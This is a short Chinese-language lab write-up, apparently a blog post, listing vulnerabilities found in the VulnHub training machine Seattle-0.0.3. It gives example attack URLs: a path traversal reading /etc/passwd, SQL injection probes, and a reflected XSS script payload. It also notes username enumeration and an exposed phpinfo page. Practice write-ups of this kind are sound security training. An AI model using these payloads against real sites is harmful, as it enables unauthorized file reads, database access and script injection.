vulnhub Seattle-0.0.3

环境：vuluhub Seattle-0.0.3

1.catelogue处任意文件下载(目录穿越)

http://192.168.85.139/download.php?item=../../../../../../etc/passwd

有个admin目录，可以下载里面的文件进行读取

2.cltohes详情页面处(参数prod)存在sql报错注入

http://192.168.85.139/details.php?prod=5&type=2

3.vily处存在布尔盲注(或时间盲注)

http://192.168.85.139/?type=1 and 1=1

4.blog处用户名泄露

5.登陆处存在用户名枚举

6.blog处存在xss

http://192.168.85.139/blog.php?author="><script>alert(5)</script>

7.phpinfo页面泄露

http://192.168.85.139/info.php

posted @ 2024-07-29 13:11 mushangqiujin 阅读(21) 评论(0) 收藏举报来源

刷新页面返回顶部

mushangqiujin